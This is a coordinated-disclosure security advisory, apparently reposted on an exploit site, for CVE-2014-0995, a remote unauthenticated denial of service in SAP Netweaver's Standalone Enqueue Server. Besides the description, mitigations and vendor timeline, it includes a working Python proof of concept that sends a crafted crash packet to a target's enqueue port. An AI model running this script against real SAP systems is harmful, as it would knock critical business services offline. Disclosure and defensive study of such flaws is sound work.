SAP Netweaver Enqueue Server - Denial of Service

SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability
 
1. **Advisory Information**
 
Title: SAP Netweaver Enqueue Server Trace Pattern Denial of Service
Vulnerability
Advisory ID: CORE-2014-0007
Advisory URL:
http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability
Date published: 2014-10-15
Date of last update: 2014-10-15
Vendors contacted: SAP
Release mode: Coordinated release
 
2. **Vulnerability Information***
*
Class: Uncontrolled Recursion [CWE-674]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0995
 
3. **Vulnerability Description**
 
        SAP Netweaver [1] is a technology platform for building and
integrating SAP business
        applications. A vulnerability has been found in SAP Netweaver
that could allow an
        unauthenticated, remote attacker to create denial of service
conditions. The vulnerability
        is triggered by sending a specially crafted SAP Enqueue Server
packet to remote TCP port 32NN
        (NN being the SAP system number) of a host running the
"Standalone Enqueue Server" service, part
        of SAP Netweaver Application Server ABAP/Java. The "Standalone
Enqueue Server" is a critical
        component of a SAP Netweaver installation in terms of
availability, rendering the whole SAP
        system unresponsive.
     
4. **Vulnerable Packages**
 
   . SAP Netweaver 7.01 (enserver.exe version v7010.32.15.63503).
   . SAP Netweaver 7.20 (enserver.exe version v7200.70.18.23869).
   
    Other versions are probably affected too, but they were not checked.
 
5. **Vendor Information, Solutions and Workarounds**
 
        Martin Gallo proposed the following actions to mitigate the
impact of the vulnerabilities:
 
        Restrict access to the Standalone Enqueue service by configuring
Access Control Lists [4] and to
        the Standalone Enqueue Service TCP port 32XX (XX is the instance
number).
     
        SAP published a security note [3] with the fix.
     
6. **Credits**
 
      This vulnerability was discovered and researched by Martin Gallo
from Core Security Consulting
      Services. The publication of this advisory was coordinated by
Joaquín Rodríguez Varela from Core
      Advisories Team.
     
7. **Technical Description / Proof of Concept Code**
 
      When the trace level of the service is configured to stop logging
when a pattern is found [2], the
      service does not properly control the amount of recursion
resulting in a stack overflow exception.
      The vulnerability can be triggered remotely by setting the trace
level with a wildcard Trace Pattern.
      This vulnerability could allow a remote, unauthenticated attacker
to conduct a denial of service
      attack against the vulnerable systems, rendering the Enqueue
Server unavailable.
       
      The following python code can be used to trigger the vulnerability:
     
7.1. **Proof of Concept**
 
/-----
import socket, struct
from optparse import OptionParser
 
# Parse the target options
parser = OptionParser()
parser.add_option("-d", "--hostname", dest="hostname", help="Hostname",
default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port
number", default=3200)
(options, args) = parser.parse_args()
 
def send_packet(sock, packet):
    packet = struct.pack("!I", len(packet)) + packet
    sock.send(packet)
 
# Connect
print "[*] Connecting to", options.hostname, "port", options.port
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))
 
print "[*] Sending crash packet"
 
crash = '\xab\xcd\xe1\x23'  # Magic bytes
crash+= '\x00\x00\x00\x00'  # Id
crash+= '\x00\x00\x00\x5b\x00\x00\x00\x5b'  # Packet/frag length
crash+= '\x03\x00\x00\x00'  # Destination/Opcode/MoreFrags/Type
crash+= 'ENC\x00'  # Admin Eye-catcher
crash+= '\x01\x00\x00\x00'  # Version
crash+= '#EAA'  # Admin Eye-catcher
crash+= '\x01\x00\x00\x00\x00'  # Len
crash+= '\x06\x00\x00\x00\x00\x00'  # Opcode/Flags/RC
crash+= '#EAE'  # Admin Eye-catcher
crash+= '\x01\x04\x00\x00'  # Version/Action/Limit/Tread
crash+= '\x00\x00\x00\x00'
crash+= '\x00\x00\x00\x03\x00\x00\x00\x03'  # Trace Level
crash+= '\x01'  # Logging
crash+= '\x01\x40\x00\x00'  # Max file size
crash+= '\x00\x00\x00\x01\x00\x00\x00\x01'  # No. patterns
crash+= '\x00\x00\x00\x25#EAH'  # Trace Eye-catcher
crash+= '\x01*\x00'  # Trace Pattern
crash+= '#EAD'  # Trace Eye-catcher
 
send_packet(connection, crash)
print "[*] Crash sent !"
-----/
 
8. **Report Timeline**
 
. 2014-06-02:
 
        Initial notification sent to SAP, including technical
description to reproduce the
        vulnerability. Publication date set to Jun 30, 2014.       
 
. 2014-06-03:
 
        Vendor notifies that the tracking number 1153917-2014 was
created for this issue.
 
. 2014-06-26:
         
        Core Security requests SAP to inform the status of the advisory.
 
. 2014-06-30:
 
        The vendor informs they were not able to reproduce the issue and
they request additional
        details and a proof of concept.
 
. 2014-06-30:
         
        Core Security sends SAP a full description of the vulnerability
including a python script
        to trigger it.
       
. 2014-07-11:
         
        Core Security asks if the vendor was able to trigger the
vulnerability. Additinally we
        requested to set a publication date for the advisory based on
the release of a fix.
       
. 2014-07-14:
 
        The vendor informs they were able to reproduce the issue but
they will not be able to provide
        a timeline for the fix at the time. They inform they will work
with high priority on it and
        will inform us of the planned fix release date.
       
. 2014-08-12:
         
        Core Security asks if the vendor was able to develop a fix and
if they have a possible timeline
        for its availability.
       
. 2014-08-13:
 
        The vendor informs that the fix is undergoing quality checks.
They also inform that they can't
        provide an exact date of publication yet. They also request a 3
months grace period once the
        patch is available.
       
. 2014-08-13:
         
        Core Security informs SAP that after we get notice that the fix
is available to the public we will
        publish the advisory accordingly and will not wait for the 3
months of grace as requested because
        that's not our proceeding policy.
       
. 2014-08-18:
 
        The vendor informs that the fix is going to be released with the
October patch day, on Tuesday the
        14th, of 2014.
       
. 2014-10-14:
 
        The vendor publishes the fix under the security note 2042845.
 
. 2014-10-15:
 
        Core Security releases the advisory.
       
9. **References**
 
[1] http://www.sap.com/platform/netweaver/index.epx.
[2]
http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/e929ca3d7001cee10000000a421937/content.htm?frameset=/en/47/ea3ef600e83b8be10000000a421937/frameset.htm
[3] SAP security note 2042845
[4] https://websmp230.sap-ag.de/sap/support/notes/1495075.

#  0day.today [2018-04-14]  #